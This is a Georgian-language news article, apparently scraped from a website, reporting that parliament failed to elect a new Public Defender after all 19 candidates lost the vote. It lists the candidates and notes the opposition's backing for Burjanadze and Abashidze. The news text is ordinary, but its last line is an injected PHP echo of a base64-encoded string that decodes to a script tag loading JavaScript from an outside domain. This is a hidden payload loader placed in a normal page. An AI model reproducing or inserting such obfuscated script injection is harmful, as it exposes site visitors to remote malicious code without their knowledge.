celsiusi
ავერსი შნაიდერი
პარლამენტმა ახალი სახალხო დამცველი ვერ აირჩია. პლენარულ სხდომაზე გამართულ დღევანდელ კენჭისყრაზე 19-ვე კანდიდატი ჩავარდა.
კენჭისყრაში მმართველ გუნდს მონაწილეობა არ მიუღია. დღევანდელ რიგგარეშე სხდომას არ ესწრებოდა „ერთიანი ნაციონალური მოძრაობა“. დანარჩენმა ოპოზიციამ კი, ღია კენჭისყრაში მონაწილეობა მიიღო და ყველაზე მეტი, 16 ხმა მოაგროვა მესამე სექტორის მიერ დასახელებულმა და ოპოზიციის მიერ წარდგენილმა კანდიდატმა, გიორგი ბურჯანაძემ.
ომბუდსმენის პოსტზე წარდგენილი კანდიდატები იყვნენ: ანა აბაშიძე, მარიკა არევაძე, გიორგი ბურჯანაძე, ლელა გაფრინდაშვილი, სოფიო დემეტრაშვილი, თინათინ ერქვანია, ევგენია თავაძე, ალექსანდრე კობაიძე, ლევან კოკორაშვილი, ნუგზარ კოხრეიძე, გიორგი მარიამიძე, სერგო მახარაძე, მაკა მინდიაშვილი, ჯემალ ნათელაშვილი, ნიკოლოზ ნიკოლაძე, ქეთევან ჩაჩავა, გიორგი ცობეხია, იაგო ხვიჩია, ნაზი ჯანეზაშვილი.
როგორც ცნობილია, კონსულტაციების დროს, „ქართულმა ოცნებამ“ ოპოზიციას სახალხო დამცველის არჩევა ხუთი კანდიდატიდან შესთავაზა, თუმცა ოპოზიციაში განაცხადეს, აღნიშნული კანდიდატები მათთვის მისაღები არ არის და თავად მხარს უჭერენ ანა აბაშიძისა და გიორგი ბურჯანაძის კანდიდატურებს.
304
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");